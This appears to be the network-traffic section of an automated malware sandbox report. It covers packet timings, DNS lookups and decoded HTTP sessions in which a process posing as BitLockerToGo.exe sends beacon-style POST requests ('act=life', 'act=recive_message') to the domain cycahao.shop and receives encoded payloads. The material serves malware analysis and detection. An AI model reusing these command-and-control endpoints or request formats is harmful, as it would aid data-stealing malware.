                                                                            Dec 27, 2024 08:20:35.730098963 CET49761443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:35.730104923 CET44349761172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:35.730149984 CET44349761172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:35.730197906 CET49761443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:35.730259895 CET49761443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:35.730283022 CET44349761172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:35.730293036 CET49761443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:35.730298996 CET44349761172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:35.849680901 CET49767443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:35.849731922 CET44349767172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:35.849855900 CET49767443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:35.850152969 CET49767443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:35.850167036 CET44349767172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:37.107300997 CET44349767172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:37.107387066 CET49767443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:37.108697891 CET49767443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:37.108704090 CET44349767172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:37.108938932 CET44349767172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:37.110656977 CET49767443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:37.110774040 CET49767443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:37.110806942 CET44349767172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:37.931690931 CET44349767172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:37.931792021 CET44349767172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:37.931868076 CET49767443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:37.932008028 CET49767443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:37.932018995 CET44349767172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:38.055432081 CET49773443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:38.055475950 CET44349773172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:38.055546045 CET49773443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:38.055896997 CET49773443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:38.055907965 CET44349773172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:39.415868998 CET44349773172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:39.415937901 CET49773443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:39.417216063 CET49773443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:39.417228937 CET44349773172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:39.417447090 CET44349773172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:39.418689966 CET49773443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:39.418826103 CET49773443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:39.418848991 CET44349773172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:39.418906927 CET49773443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:39.418911934 CET44349773172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:40.227823973 CET44349773172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:40.227910042 CET44349773172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:40.228107929 CET49773443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:40.228122950 CET49773443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:40.452939987 CET49779443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:40.452977896 CET44349779172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:40.453066111 CET49779443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:40.453430891 CET49779443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:40.453447104 CET44349779172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:41.713898897 CET44349779172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:41.713968992 CET49779443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:41.715305090 CET49779443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:41.715320110 CET44349779172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:41.715553045 CET44349779172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:41.716696024 CET49779443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:41.717051029 CET49779443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:41.717072010 CET44349779172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:41.717129946 CET49779443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:41.717135906 CET44349779172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:42.606658936 CET44349779172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:42.606785059 CET44349779172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:42.606848001 CET49779443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:42.606986046 CET49779443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:42.607002020 CET44349779172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:42.828325987 CET49785443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:42.828358889 CET44349785172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:42.828460932 CET49785443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:42.828727961 CET49785443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:42.828744888 CET44349785172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:44.155941963 CET44349785172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:44.156008959 CET49785443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:44.157394886 CET49785443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:44.157399893 CET44349785172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:44.157617092 CET44349785172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:44.159008026 CET49785443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:44.159102917 CET49785443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:44.159107924 CET44349785172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:44.906394958 CET44349785172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:44.906485081 CET44349785172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:44.906546116 CET49785443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:44.906649113 CET49785443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:44.906663895 CET44349785172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:45.369602919 CET49791443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:45.369662046 CET44349791172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:45.369760036 CET49791443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:45.370138884 CET49791443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:45.370171070 CET44349791172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:46.581720114 CET44349791172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:46.581923008 CET49791443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:46.583044052 CET49791443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:46.583058119 CET44349791172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:46.583302021 CET44349791172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:46.592448950 CET49791443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:46.593169928 CET49791443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:46.593209028 CET44349791172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:46.593301058 CET49791443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:46.593333960 CET44349791172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:46.593445063 CET49791443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:46.593486071 CET44349791172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:46.593596935 CET49791443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:46.593627930 CET44349791172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:46.593713999 CET49791443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:46.593744040 CET44349791172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:46.593871117 CET49791443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:46.593897104 CET44349791172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:46.593904972 CET49791443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:46.594036102 CET49791443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:46.594064951 CET49791443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:46.639333963 CET44349791172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:46.639507055 CET49791443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:46.639540911 CET49791443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:46.639548063 CET49791443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:46.687381983 CET44349791172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:46.687596083 CET49791443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:46.687647104 CET49791443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:46.687669992 CET49791443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:46.731332064 CET44349791172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:46.731436014 CET49791443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:46.775338888 CET44349791172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:46.952884912 CET44349791172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:48.754611015 CET44349791172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:48.754724979 CET44349791172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:48.754817009 CET49791443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:48.759172916 CET49791443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:48.759196043 CET44349791172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:48.768770933 CET49801443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:48.768805981 CET44349801172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:48.768872023 CET49801443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:48.769167900 CET49801443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:48.769186974 CET44349801172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:50.072513103 CET44349801172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:50.072640896 CET49801443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:50.073941946 CET49801443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:50.073955059 CET44349801172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:50.074481964 CET44349801172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:50.077554941 CET49801443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:50.077574015 CET49801443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:50.077645063 CET44349801172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:50.846494913 CET44349801172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:50.846601963 CET44349801172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:50.846664906 CET49801443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:50.846854925 CET49801443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:50.846868992 CET44349801172.67.135.139192.168.2.6
                                                                            Dec 27, 2024 08:20:50.846879959 CET49801443192.168.2.6172.67.135.139
                                                                            Dec 27, 2024 08:20:50.846887112 CET44349801172.67.135.139192.168.2.6
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Dec 27, 2024 08:20:31.189614058 CET5675053192.168.2.61.1.1.1
                                                                            Dec 27, 2024 08:20:31.508225918 CET53567501.1.1.1192.168.2.6
                                                                            Dec 27, 2024 08:20:50.848031998 CET5837053192.168.2.61.1.1.1
                                                                            Dec 27, 2024 08:20:51.070208073 CET53583701.1.1.1192.168.2.6
                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Dec 27, 2024 08:20:31.189614058 CET192.168.2.61.1.1.10x67c6Standard query (0)cycahao.shopA (IP address)IN (0x0001)false
                                                                            Dec 27, 2024 08:20:50.848031998 CET192.168.2.61.1.1.10x3fa7Standard query (0)kliptizq.shopA (IP address)IN (0x0001)false
                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Dec 27, 2024 08:20:31.508225918 CET1.1.1.1192.168.2.60x67c6No error (0)cycahao.shop172.67.135.139A (IP address)IN (0x0001)false
                                                                            Dec 27, 2024 08:20:31.508225918 CET1.1.1.1192.168.2.60x67c6No error (0)cycahao.shop104.21.7.3A (IP address)IN (0x0001)false
                                                                            Dec 27, 2024 08:20:51.070208073 CET1.1.1.1192.168.2.60x3fa7Name error (3)kliptizq.shopnonenoneA (IP address)IN (0x0001)false
                                                                            • cycahao.shop
                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.649754172.67.135.139443612C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-27 07:20:32 UTC259OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 8
                                                                            Host: cycahao.shop
                                                                            2024-12-27 07:20:32 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                            Data Ascii: act=life
                                                                            2024-12-27 07:20:33 UTC1042INHTTP/1.1 200 OK
                                                                            Date: Fri, 27 Dec 2024 07:20:33 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=4fvirs1voh2n68oo8dtmldhmin; expires=Tue, 22-Apr-2025 01:07:12 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tupLEinVAoY%2B6I1BRqHaQDc4%2FdaQWDg%2BBuhK%2B%2Bus2%2BI7h3pzTGN5dppluz6sdi%2BxLsi04VK8k7tzX56WK7Hi%2B6GMDoDyxXkJ9sPy6oY%2BE4UfhVfA6iUcOKPWBZ00l8g%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8f878c7659040cb2-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1649&min_rtt=1633&rtt_var=644&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=903&delivery_rate=1658148&cwnd=152&unsent_bytes=0&cid=196a0bf93f7449b5&ts=713&x=0"
                                                                            2024-12-27 07:20:33 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                            Data Ascii: 2ok
                                                                            2024-12-27 07:20:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.649761172.67.135.139443612C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-27 07:20:34 UTC260OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 78
                                                                            Host: cycahao.shop
                                                                            2024-12-27 07:20:34 UTC78OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 56 49 4b 41 26 6a 3d 66 62 33 64 65 30 39 36 65 37 62 66 31 66 39 65 61 32 36 30 36 30 64 34 63 66 61 39 33 39 65 62
                                                                            Data Ascii: act=recive_message&ver=4.0&lid=hRjzG3--VIKA&j=fb3de096e7bf1f9ea26060d4cfa939eb
                                                                            2024-12-27 07:20:35 UTC1026INHTTP/1.1 200 OK
                                                                            Date: Fri, 27 Dec 2024 07:20:35 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=gdu9sk7h050g4ko6esbf3ahonr; expires=Tue, 22-Apr-2025 01:07:14 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bj0FuJEPG6xAMSW7HdtrsxiiOhdTOq2ZRqHtdYuU8LZMsJ5LFAW1OAaSjYl0%2BeiqssNwFDaT1Gv3YyEJ2zFUYoOHgnNXaipwcLFvdXtbJ1EL6FMKWvMVhSUpfh8Kt5U%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8f878c832de44213-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1630&min_rtt=1628&rtt_var=612&sent=7&recv=9&lost=0&retrans=0&sent_bytes=2825&recv_bytes=974&delivery_rate=1793611&cwnd=229&unsent_bytes=0&cid=5908e4ec52831cf9&ts=819&x=0"
                                                                            2024-12-27 07:20:35 UTC343INData Raw: 32 64 63 61 0d 0a 57 59 77 6d 52 51 79 69 47 69 5a 57 48 65 57 32 67 76 7a 6b 50 50 76 68 65 35 6d 6d 4e 66 70 34 57 45 39 43 55 45 6d 6e 4c 7a 6f 69 72 6c 42 6e 4e 70 59 32 42 43 56 34 78 34 7a 32 6a 70 46 5a 31 38 4d 61 2f 59 51 50 6e 42 6b 30 50 43 64 38 61 39 46 43 47 47 50 71 52 79 6c 2f 78 7a 59 45 4d 32 58 48 6a 4e 6d 48 78 6c 6d 56 77 30 47 37 77 31 2b 59 47 54 51 74 49 7a 73 6d 31 30 4e 5a 4d 65 42 42 4c 57 6e 42 66 6b 63 36 63 49 44 54 35 35 32 4f 55 70 4b 4d 45 2f 53 45 47 64 67 64 49 6d 31 34 63 67 54 43 57 31 73 55 37 56 55 75 4c 74 38 32 58 58 52 34 69 35 53 34 33 6f 56 5a 6d 59 30 64 2f 63 31 64 6b 68 41 38 4c 43 59 36 4f 63 35 4a 55 6a 48 75 51 69 78 6a 79 47 70 4b 4d 48 65 4c 31 65 32 64 78 68 44 5a 68 41 47 37 6e 42 66 4c 4b 44 6b 38 4d
                                                                            Data Ascii: 2dcaWYwmRQyiGiZWHeW2gvzkPPvhe5mmNfp4WE9CUEmnLzoirlBnNpY2BCV4x4z2jpFZ18Ma/YQPnBk0PCd8a9FCGGPqRyl/xzYEM2XHjNmHxlmVw0G7w1+YGTQtIzsm10NZMeBBLWnBfkc6cIDT552OUpKME/SEGdgdIm14cgTCW1sU7VUuLt82XXR4i5S43oVZmY0d/c1dkhA8LCY6Oc5JUjHuQixjyGpKMHeL1e2dxhDZhAG7nBfLKDk8M
                                                                            2024-12-27 07:20:35 UTC1369INData Raw: 38 4a 42 47 47 4f 75 51 69 6c 76 7a 58 68 57 50 48 53 4d 30 66 4b 56 6a 31 4f 55 67 78 54 78 79 31 53 59 48 54 41 6e 4c 7a 67 76 79 45 42 65 4f 2b 34 45 61 53 37 48 59 41 52 73 50 36 54 52 38 4a 6d 4b 53 4e 75 35 57 65 53 4b 54 74 67 64 4e 6d 31 34 63 69 50 41 54 6c 73 77 34 55 63 76 5a 64 4a 34 56 6a 4a 79 67 73 62 6d 6d 34 68 55 6d 70 45 54 39 63 4a 55 6b 52 45 7a 4b 43 63 32 61 34 73 4e 58 79 4f 75 48 47 64 50 7a 58 4e 49 50 6d 69 48 6c 50 2f 51 6e 78 36 65 6a 31 6d 6a 68 46 4f 5a 48 6a 73 70 4c 6a 77 76 79 55 74 57 4e 75 46 43 4c 57 37 48 63 6b 77 38 66 6f 72 66 37 35 36 44 55 35 32 46 46 66 72 42 46 39 5a 61 50 54 56 67 61 6d 76 72 53 6c 73 70 72 48 45 6b 59 4d 35 2f 55 6e 52 67 79 63 32 67 6d 59 6f 65 77 63 4d 58 2f 73 74 46 6d 51 67 2f 49 7a 49 2b
                                                                            Data Ascii: 8JBGGOuQilvzXhWPHSM0fKVj1OUgxTxy1SYHTAnLzgvyEBeO+4EaS7HYARsP6TR8JmKSNu5WeSKTtgdNm14ciPATlsw4UcvZdJ4VjJygsbmm4hUmpET9cJUkREzKCc2a4sNXyOuHGdPzXNIPmiHlP/Qnx6ej1mjhFOZHjspLjwvyUtWNuFCLW7Hckw8forf756DU52FFfrBF9ZaPTVgamvrSlsprHEkYM5/UnRgyc2gmYoewcMX/stFmQg/IzI+
                                                                            2024-12-27 07:20:35 UTC1369INData Raw: 38 77 72 48 45 6b 59 4d 35 2f 55 6e 52 67 79 63 32 67 6d 59 6f 65 77 63 4d 55 38 38 46 53 6c 78 73 77 49 79 55 34 4a 38 31 44 57 79 6e 68 51 43 64 69 79 48 4a 4a 4f 6e 75 50 33 65 75 56 67 46 36 59 69 56 6d 31 68 46 43 41 57 6d 4a 74 46 44 55 6e 79 45 49 61 44 75 31 4b 4b 57 6e 57 4f 46 74 36 5a 73 66 54 37 4e 37 65 48 70 57 4b 47 66 44 4f 55 35 67 64 4e 79 67 6a 4e 53 6a 49 53 6c 49 31 36 55 41 72 5a 38 31 2b 52 44 4e 37 67 73 62 6c 6c 34 70 53 32 63 31 5a 2f 4e 77 58 77 46 6f 56 4b 6a 59 78 42 4d 5a 63 55 58 76 78 43 6a 34 75 78 33 51 45 62 44 2b 41 30 65 69 56 67 46 61 5a 6b 52 7a 31 7a 31 61 53 48 44 73 67 4c 44 51 72 78 45 31 65 4e 2b 35 44 49 48 7a 53 66 55 49 6d 64 63 65 61 6f 4a 6d 65 48 73 48 44 4c 2b 76 54 52 6f 35 59 44 79 34 75 50 43 7a 54 44
                                                                            Data Ascii: 8wrHEkYM5/UnRgyc2gmYoewcMU88FSlxswIyU4J81DWynhQCdiyHJJOnuP3euVgF6YiVm1hFCAWmJtFDUnyEIaDu1KKWnWOFt6ZsfT7N7eHpWKGfDOU5gdNygjNSjISlI16UArZ81+RDN7gsbll4pS2c1Z/NwXwFoVKjYxBMZcUXvxCj4ux3QEbD+A0eiVgFaZkRz1z1aSHDsgLDQrxE1eN+5DIHzSfUImdceaoJmeHsHDL+vTRo5YDy4uPCzTD
                                                                            2024-12-27 07:20:35 UTC1369INData Raw: 43 4b 6d 76 50 63 6c 59 38 63 59 72 66 37 35 57 55 58 70 53 48 46 66 2f 4d 58 4a 4a 61 64 47 30 6e 4b 6d 75 64 44 57 30 32 34 55 51 6b 65 49 42 6e 43 69 30 2f 67 4e 69 67 78 73 5a 53 6c 34 4d 57 39 38 68 63 6b 42 73 32 49 79 63 33 49 73 31 46 53 6a 72 71 54 43 5a 67 7a 33 6c 41 4d 58 71 44 30 2b 53 59 69 52 37 58 77 78 37 6a 68 41 2f 59 4e 52 30 59 59 68 4d 52 68 56 49 57 49 71 35 44 4b 79 36 59 4f 45 67 33 63 34 2f 62 35 70 65 4b 56 4a 43 49 46 66 44 41 57 35 45 66 50 43 77 6c 4e 79 72 42 51 56 49 39 37 55 63 6f 59 63 39 77 42 48 6f 2f 67 4d 79 67 78 73 5a 37 6a 6f 67 58 2f 59 52 49 31 67 4e 36 4b 69 78 79 63 34 56 42 55 54 33 6f 51 53 74 76 78 6e 42 42 50 48 75 47 30 75 61 64 69 56 71 63 67 68 62 2f 79 46 6d 53 47 7a 73 68 4b 7a 30 67 77 41 30 57 65 2b
                                                                            Data Ascii: CKmvPclY8cYrf75WUXpSHFf/MXJJadG0nKmudDW024UQkeIBnCi0/gNigxsZSl4MW98hckBs2Iyc3Is1FSjrqTCZgz3lAMXqD0+SYiR7Xwx7jhA/YNR0YYhMRhVIWIq5DKy6YOEg3c4/b5peKVJCIFfDAW5EfPCwlNyrBQVI97UcoYc9wBHo/gMygxsZ7jogX/YRI1gN6Kixyc4VBUT3oQStvxnBBPHuG0uadiVqcghb/yFmSGzshKz0gwA0We+
                                                                            2024-12-27 07:20:35 UTC1369INData Raw: 77 58 31 4f 4f 48 69 43 33 2b 2b 53 78 68 44 5a 68 41 47 37 6e 42 65 32 45 53 6b 36 49 7a 77 67 30 31 59 59 4a 4b 42 64 5a 32 6e 4d 4f 42 78 30 66 49 7a 66 35 4a 36 4b 58 70 32 4f 47 65 6e 4c 55 4a 38 54 4d 54 38 71 4e 53 7a 4f 52 56 4d 30 36 46 59 72 59 4e 4a 39 56 69 59 2f 79 5a 54 6e 68 73 59 47 32 62 55 65 36 39 52 55 32 69 73 73 4c 6a 59 35 4a 73 6b 4e 52 33 58 33 42 43 42 69 67 43 41 45 4d 6e 43 4f 31 2b 2b 66 6a 31 4b 55 68 68 44 2b 78 56 47 63 45 44 41 74 4a 6a 51 71 77 45 64 62 4f 75 52 4e 49 47 62 48 65 31 5a 30 4d 63 66 54 2b 4e 37 65 48 72 43 45 43 2f 58 55 46 34 64 55 49 32 30 6e 50 6d 75 64 44 56 77 78 34 55 41 67 59 73 5a 39 51 6a 6c 2b 69 4e 58 67 6b 59 4a 56 6b 49 55 59 39 73 46 61 6e 41 67 77 4a 69 38 2b 49 73 6c 41 47 48 57 75 51 7a 38
                                                                            Data Ascii: wX1OOHiC3++SxhDZhAG7nBe2ESk6Izwg01YYJKBdZ2nMOBx0fIzf5J6KXp2OGenLUJ8TMT8qNSzORVM06FYrYNJ9ViY/yZTnhsYG2bUe69RU2issLjY5JskNR3X3BCBigCAEMnCO1++fj1KUhhD+xVGcEDAtJjQqwEdbOuRNIGbHe1Z0McfT+N7eHrCEC/XUF4dUI20nPmudDVwx4UAgYsZ9Qjl+iNXgkYJVkIUY9sFanAgwJi8+IslAGHWuQz8
                                                                            2024-12-27 07:20:35 UTC1369INData Raw: 54 4a 74 68 39 6e 71 6a 49 78 56 6e 49 34 55 39 73 64 52 6e 68 45 32 50 79 6b 79 4b 4d 34 4e 46 6e 76 70 58 47 63 32 67 46 74 54 49 6e 57 41 32 50 61 56 68 31 32 50 6a 67 6d 37 69 68 65 4a 48 53 74 74 65 43 51 37 30 6b 70 48 64 66 63 45 49 47 4b 41 49 41 51 79 64 6f 48 54 35 70 43 55 57 35 2b 4d 46 76 4c 4e 55 35 41 5a 4f 69 6b 6b 4e 53 37 47 51 56 4d 38 37 55 73 6a 5a 38 35 78 53 33 51 78 78 39 50 34 33 74 34 65 75 4a 67 61 39 38 6b 58 68 31 51 6a 62 53 63 2b 61 35 30 4e 56 44 58 72 52 43 31 6f 78 48 31 43 50 6e 71 48 33 2b 4f 52 67 6c 69 64 6a 42 6e 77 7a 56 61 65 48 7a 41 6d 4a 6a 38 6f 77 30 73 59 64 61 35 44 50 79 36 59 4f 47 51 76 63 6f 76 54 6f 49 48 49 52 39 6d 45 46 62 75 63 46 35 4d 57 50 69 6f 67 50 79 6a 4e 53 46 77 78 36 30 51 76 66 4d 68 34
